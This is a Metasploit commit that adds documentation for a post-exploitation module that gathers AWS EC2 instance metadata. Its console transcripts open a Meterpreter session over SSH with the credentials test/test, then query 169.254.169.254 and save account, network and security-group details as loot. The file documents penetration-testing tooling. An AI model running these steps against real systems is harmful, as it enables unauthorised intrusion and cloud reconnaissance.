Add kb for aws_ec2_instance_metadata

jhart-r7 · jhart-r7 · commit cf20ccaccd48 · 2016-09-30T07:02:33.000-07:00
diff --git a/documentation/modules/post/multi/gather/aws_ec2_instance_metadata.md b/documentation/modules/post/multi/gather/aws_ec2_instance_metadata.md
@@ -0,0 +1,198 @@
+## Vulnerable Application
+
+  This module uses an existing session on an AWS EC2 instance to gather
+  the metadata about the instance.  As such, any EC2 instance with `curl`
+  is an applicable target.
+
+## Verification Steps
+
+  1. Get session
+  2. Do `use post/multi/gather/aws_ec2_instance_metadata`
+  3. Do `set SESSION <session id>`
+  4. Do `run`
+  5. See loot.
+
+## Options
+
+  Set `VERBOSE` to `true` if you would like the AWS EC2 instance metadata to be shown
+  in addition to being stored.
+
+## Scenarios
+
+  Default, non-verbose mode:
+
+  ```
+  resource (msf.rc)> use exploit/multi/ssh/sshexec
+  resource (msf.rc)> set PASSWORD test
+  PASSWORD => test
+  resource (msf.rc)> set USERNAME test
+  USERNAME => test
+  resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
+  PAYLOAD => linux/x86/meterpreter/bind_tcp
+  resource (msf.rc)> set RHOST 192.168.2.2
+  RHOST => 192.168.2.2
+  resource (msf.rc)> run -j
+  [*] Exploit running as background job.
+  resource (msf.rc)> sleep 10
+  [*] Started bind handler
+  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+  [*] 192.168.2.2:22 - Sending stager...
+  [*] Command Stager progress -  42.09% done (306/727 bytes)
+  [*] Sending stage (1495599 bytes) to 192.168.2.2
+  [*] Command Stager progress - 100.00% done (727/727 bytes)
+  [*] Meterpreter session 1 opened (192.168.1.149:52075 -> 192.168.2.2:4444) at 2016-09-30 06:40:44 -0700
+
+  resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
+  resource (msf.rc)> set SESSION 1
+  SESSION => 1
+  resource (msf.rc)> run
+  [*] Gathering AWS EC2 instance metadata
+  [+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930064126_default_192.168.2.2_aws.ec2.instance_509214.txt
+  [*] Post module execution completed
+  ```
+
+  Non-default, verbose mode:
+
+  ```
+  resource (msf.rc)> use exploit/multi/ssh/sshexec
+  resource (msf.rc)> set PASSWORD test
+  PASSWORD => test
+  resource (msf.rc)> set USERNAME test
+  USERNAME => test
+  resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
+  PAYLOAD => linux/x86/meterpreter/bind_tcp
+  resource (msf.rc)> set RHOST 192.168.2.2
+  RHOST => 192.168.2.2
+  resource (msf.rc)> run -j
+  [*] Exploit running as background job.
+  resource (msf.rc)> sleep 10
+  [*] Started bind handler
+  [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+  [*] 192.168.2.2:22 - Sending stager...
+  [*] Command Stager progress -  42.09% done (306/727 bytes)
+  [*] Sending stage (1495599 bytes) to 192.168.2.2
+  [*] Command Stager progress - 100.00% done (727/727 bytes)
+  [*] Meterpreter session 1 opened (192.168.1.149:52775 -> 192.168.2.2:4444) at 2016-09-30 06:55:54 -0700
+  resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
+  resource (msf.rc)> set SESSION 1
+  SESSION => 1
+  resource (msf.rc)> set VERBOSE true
+  VERBOSE => true
+  resource (msf.rc)> run
+  [*] Fetching http://169.254.169.254/latest/meta-data/
+  [*] Gathering AWS EC2 instance metadata
+  [*] Fetching http://169.254.169.254/latest/meta-data/ami-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/ami-launch-index
+  [*] Fetching http://169.254.169.254/latest/meta-data/ami-manifest-path
+  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/
+  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/ami
+  [*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/root
+  [*] Fetching http://169.254.169.254/latest/meta-data/hostname
+  [*] Fetching http://169.254.169.254/latest/meta-data/instance-action
+  [*] Fetching http://169.254.169.254/latest/meta-data/instance-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/instance-type
+  [*] Fetching http://169.254.169.254/latest/meta-data/local-hostname
+  [*] Fetching http://169.254.169.254/latest/meta-data/local-ipv4
+  [*] Fetching http://169.254.169.254/latest/meta-data/mac
+  [*] Fetching http://169.254.169.254/latest/meta-data/metrics/
+  [*] Fetching http://169.254.169.254/latest/meta-data/metrics/vhostmd
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/device-number
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/interface-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/192.168.2.2
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-hostname
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-ipv4s
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/mac
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/owner-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-hostname
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-ipv4s
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-group-ids
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-groups
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-ipv4-cidr-block
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-block
+  [*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-blocks
+  [*] Fetching http://169.254.169.254/latest/meta-data/placement/
+  [*] Fetching http://169.254.169.254/latest/meta-data/placement/availability-zone
+  [*] Fetching http://169.254.169.254/latest/meta-data/profile
+  [*] Fetching http://169.254.169.254/latest/meta-data/public-hostname
+  [*] Fetching http://169.254.169.254/latest/meta-data/public-ipv4
+  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/
+  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/
+  [*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
+  [*] Fetching http://169.254.169.254/latest/meta-data/reservation-id
+  [*] Fetching http://169.254.169.254/latest/meta-data/security-groups
+  [*] Fetching http://169.254.169.254/latest/meta-data/services/
+  [*] Fetching http://169.254.169.254/latest/meta-data/services/domain
+  [*] Fetching http://169.254.169.254/latest/meta-data/services/partition
+  [+] AWS EC2 instance metadata
+  {
+    "ami-id": "ami-2d39803a",
+    "ami-launch-index": "0",
+    "ami-manifest-path": "(unknown)",
+    "block-device-mapping": {
+      "ami": "/dev/sda1",
+      "root": "/dev/sda1"
+    },
+    "hostname": "ip-192.168.2.2.ec2.internal",
+    "instance-action": "none",
+    "instance-id": "i-16fffae",
+    "instance-type": "t2.medium",
+    "local-hostname": "ip-192.168.2.2.ec2.internal",
+    "local-ipv4": "192.168.2.2",
+    "mac": "aa:bb:cc:dd:ee:ff",
+    "metrics": {
+      "vhostmd": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    },
+    "network": {
+      "interfaces": {
+        "macs": {
+          "aa:bb:cc:dd:ee:ff": {
+            "device-number": "0",
+            "interface-id": "eni-1234ff",
+            "ipv4-associations": {
+              "192.168.2.2": "192.168.2.2"
+            },
+            "local-hostname": "ip-192.168.2.2.ec2.internal",
+            "local-ipv4s": "192.168.2.2",
+            "mac": "aa:bb:cc:dd:ee:ff",
+            "owner-id": "186638383",
+            "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
+            "public-ipv4s": "192.168.2.2",
+            "security-group-ids": "sg-123a7",
+            "security-groups": "launch-wizard-15",
+            "subnet-id": "subnet-123453d",
+            "subnet-ipv4-cidr-block": "192.0.2.0/24",
+            "vpc-id": "vpc-fffffff",
+            "vpc-ipv4-cidr-block": "192.0.0.0/16",
+            "vpc-ipv4-cidr-blocks": "192.0.0.0/16"
+          }
+        }
+      }
+    },
+    "placement": {
+      "availability-zone": "us-east-1e"
+    },
+    "profile": "default-hvm",
+    "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
+    "public-ipv4": "192.168.2.2",
+    "public-keys": {
+      "0": {
+        "openssh-key": "ssh-rsa <...redacted...> jhart"
+      }
+    },
+    "reservation-id": "r-8675309",
+    "security-groups": "launch-wizard-15",
+    "services": {
+      "domain": "amazonaws.com",
+      "partition": "aws"
+    }
+  }
+  [+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930065628_default_192.168.2.2_aws.ec2.instance_622503.txt
+  [*] Post module execution completed
+  ```
